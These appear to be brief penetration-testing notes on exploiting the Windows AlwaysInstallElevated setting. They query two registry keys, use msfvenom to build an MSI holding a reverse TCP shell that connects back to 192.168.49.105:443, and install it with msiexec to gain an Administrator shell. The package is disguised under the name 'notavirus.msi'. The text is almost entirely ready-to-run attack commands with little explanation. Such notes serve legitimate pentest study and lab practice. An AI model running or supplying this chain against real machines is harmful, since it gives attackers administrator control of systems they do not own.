Exploiting AlwaysInstallElevated.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If both commands have the output: AlwaysInstallElevated REG_DWORD 0x1.
We can exploit this by generating a reverse msi that would connect back to us as Administrator.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.105 LPORT=443 -f msi -o notavirus.msi
msiexec /i "C:\Path\TO\malicous.msi"
